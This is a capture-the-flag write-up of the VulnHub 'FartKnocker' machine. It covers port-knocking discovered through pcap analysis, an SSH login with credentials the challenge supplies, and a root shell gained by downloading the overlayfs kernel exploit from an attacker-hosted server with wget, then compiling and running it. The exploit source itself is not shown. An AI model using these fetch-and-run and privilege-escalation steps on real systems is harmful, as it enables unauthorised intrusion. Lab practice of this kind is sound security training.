TopHatSec: FartKnocker

Location

https://www.vulnhub.com/entry/tophatsec-fartknocker,115/

Description

New VM challenge that should be fun for people trying to get into packet analysis!

Enumeration

nmap -T4 -A -p- 192.168.110.4

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

When I visit the website, there is a reference to Beavis and Butthead. And a pcap file to download. Because it’s enticing to just focus on the pcap, I still check on other options.
But as there is no robots.txt file and dirb and nikto came up with nothing, I’m going to inspect the pcap with wireshark.
At first glance it looks like there is a port scan. Mostly the traffic consist of ICMP and some blocked attempts on a connection (RST, ACK). When I apply a filter, it becomes more clear what is happening.

tcp && ip.src==192.168.56.102

It appears there has been used a form of port knocking. The sequence is port 7000, 8000 and last 9000. After the port knocking there is a connection request to port 8888. So this will be the port that needs to open.

Port Knocking

Back to nmap, but this time with another mission.

for x in 7000 8000 9000; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x 192.168.110.4; done

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
8888/tcp open sun-answerbook?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8888-TCP:V=7.25BETA1%I=7%D=8/9%Time=57A9AABB%P=i686-pc-linux-gnu%r(
SF:NULL,E,"/burgerworld/\n")%r(GetRequest,E,"/burgerworld/\n")%r(HTTPOptio
SF:ns,E,"/burgerworld/\n")%r(FourOhFourRequest,E,"/burgerworld/\n")%r(Java
SF:RMI,E,"/burgerworld/\n")%r(GenericLines,E,"/burgerworld/\n")%r(RTSPRequ
SF:est,E,"/burgerworld/\n")%r(RPCCheck,E,"/burgerworld/\n")%r(DNSVersionBi
SF:ndReq,E,"/burgerworld/\n")%r(DNSStatusRequest,E,"/burgerworld/\n")%r(He
SF:lp,E,"/burgerworld/\n")%r(SSLSessionReq,E,"/burgerworld/\n")%r(TLSSessi
SF:onReq,E,"/burgerworld/\n")%r(Kerberos,E,"/burgerworld/\n")%r(SMBProgNeg
SF:,E,"/burgerworld/\n")%r(X11Probe,E,"/burgerworld/\n")%r(LPDString,E,"/b
SF:urgerworld/\n")%r(LDAPSearchReq,E,"/burgerworld/\n")%r(LDAPBindReq,E,"/
SF:burgerworld/\n")%r(SIPOptions,E,"/burgerworld/\n")%r(LANDesk-RC,E,"/bur
SF:gerworld/\n")%r(TerminalServer,E,"/burgerworld/\n")%r(NCP,E,"/burgerwor
SF:ld/\n")%r(NotesRPC,E,"/burgerworld/\n")%r(WMSRequest,E,"/burgerworld/\n
SF:")%r(oracle-tns,E,"/burgerworld/\n")%r(afp,E,"/burgerworld/\n")%r(kumo-
SF:server,E,"/burgerworld/\n")%r(giop,E,"/burgerworld/\n");

As I thought. Port 8888 is open now. It isn’t accepting connection, but looking at the nmap result it looks like it gives up some information before it locks up again. In this case /burgerworld/.

After checking robots.txt and dirb again, which came up with nothing, I focus on the next pcap file. After I filter some information and follow the TCP stream I get an interesting view.

Underneath is the message:

CAN YOU UNDERSTAND MY MESSAGE?!
eins drei drei sieben

Again it is time for some port knocking.

for x in 1 3 3 7; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x 192.168.110.4; done

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
1337/tcp open waste?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.25BETA1%I=7%D=8/9%Time=57A9B103%P=i686-pc-linux-gnu%r(
SF:NULL,F,"/iamcornholio/\n")%r(GenericLines,F,"/iamcornholio/\n")%r(GetRe
SF:quest,F,"/iamcornholio/\n")%r(HTTPOptions,F,"/iamcornholio/\n")%r(RTSPR
SF:equest,F,"/iamcornholio/\n")%r(RPCCheck,F,"/iamcornholio/\n")%r(DNSVers
SF:ionBindReq,F,"/iamcornholio/\n")%r(DNSStatusRequest,F,"/iamcornholio/\n
SF:")%r(Help,F,"/iamcornholio/\n")%r(SSLSessionReq,F,"/iamcornholio/\n")%r

SSH

echo -n ‘T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK’ | base64 –decode
Open up SSH: 8888 9999 7777 6666
for x in 8888 9999 7777 6666; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x 192.168.110.4; done
root@PlanetMars:~# ssh 192.168.110.4 -p 22
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ECDSA key sent by the remote host is
SHA256:uSdkKIWXcJl0j0P5Y+cAzjD9CJOFQ/NxtG8kz8ptzFE.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /root/.ssh/known_hosts:8
remove with:
ssh-keygen -f “/root/.ssh/known_hosts” -R 192.168.110.4
ECDSA host key for 192.168.110.4 has changed and you have requested strict checking.
Host key verification failed.
root@PlanetMars:~# ssh-keygen -f “/root/.ssh/known_hosts” -R 192.168.110.4
# Host 192.168.110.4 found: line 8
/root/.ssh/known_hosts updated.
Original contents retained as /root/.ssh/known_hosts.old
root@PlanetMars:~# ssh 192.168.110.4 -p 22 -l butthead
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER                #
# USERNAME: butthead                                                                       #
# PASSWORD: nachosrule                                                                   #
############################################
butthead@192.168.110.4’s password:
Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)
* Documentation: https://help.ubuntu.com/
Last login: Tue Mar 3 01:02:49 2015 from 192.168.56.102
You are only logging in for a split second! What do you do!
Connection to 192.168.110.4 closed.
ssh butthead@192.168.110.4 “/bin/sh”
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER                #
# USERNAME: butthead                                                                       #
# PASSWORD: nachosrule                                                                   #
############################################
butthead@192.168.110.4’s password: nachosrule
id
uid=1001(butthead) gid=1001(butthead) groups=1001(butthead)

And I’m in with a limited shell.

ls -lah
total 28K
drwxr-xr-x 3 butthead butthead 4.0K Mar 3 2015 .
drwxr-xr-x 4 root root 4.0K Mar 3 2015 ..
-rw-r–r– 1 butthead butthead 220 Apr 8 2014 .bash_logout
-rw-r–r– 1 butthead butthead 3.6K Mar 3 2015 .bashrc
drwx—— 2 butthead butthead 4.0K Mar 3 2015 .cache
-rw-rw-r– 1 butthead butthead 67 Mar 3 2015 nachos
-rw-r–r– 1 butthead butthead 747 Mar 3 2015 .profile
cat nachos
Great job on getting this far.
Can you login as beavis or root ?

When I look at the home directory it seems the only 2 users are beavis and butthead (obvious). I get some information about the system. It runs on Ubuntu 14.04 with kernel 3.13. Let’s see if I can use the overlayfs local root exploit.

Overlayfs Local Root Exploit

wget http://192.168.110.3/overlayfs.c
–2016-08-09 07:02:18– http://192.168.110.3/overlayfs.c
Connecting to 192.168.110.3:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 4969 (4.9K) [text/x-csrc]
Saving to: ‘overlayfs.c’
0K …. 100% 386M=0s
2016-08-09 07:02:18 (386 MB/s) – ‘overlayfs.c’ saved [4969/4969]
ls -lah
total 16K
drwxrwxrwt 2 root root 4.0K Aug 9 07:02 .
drwxr-xr-x 21 root root 4.0K Mar 2 2015 ..
-rw-rw-r– 1 butthead butthead 4.9K Aug 9 07:01 overlayfs.c
gcc overlayfs.c -o overlayfs
chmod 777 overlayfs
ls -lah
total 28K
drwxrwxrwt 2 root root 4.0K Aug 9 07:02 .
drwxr-xr-x 21 root root 4.0K Mar 2 2015 ..
-rwxrwxrwx 1 butthead butthead 12K Aug 9 07:02 overlayfs
-rw-rw-r– 1 butthead butthead 4.9K Aug 9 07:01 overlayfs.c
./overlayfs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can’t access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root),1001(butthead)
# cd /root
# ls -lah
total 28K
drwx—— 3 root root 4.0K Mar 3 2015 .
drwxr-xr-x 21 root root 4.0K Mar 2 2015 ..
drwx—— 2 root root 4.0K Mar 2 2015 .aptitude
-rw——- 1 root root 370 Mar 3 2015 .bash_history
-rw-r–r– 1 root root 3.1K Feb 19 2014 .bashrc
-rw-r–r– 1 root root 140 Feb 19 2014 .profile
-rw-r–r– 1 root root 202 Mar 3 2015 SECRETZ
# cat SECRETZ
You have done a great job, if you can see this, please shoot me an email
and let me know that you have beat this box!
SECRET = “LIVE LONG AND PROSPER, REST IN PEACE MR. SPOCK”
admin@top-hat-sec.com

Conclusion

This was a fun boot2root challenge with a Beavis and Butthead theme.
It was fun to get the hints from the pcap files. Because the port knocking was repeated several times, it wasn’t very hard to follow the breadcrumbs. For a beginner this will be a fun way to get his/hers hands dirty.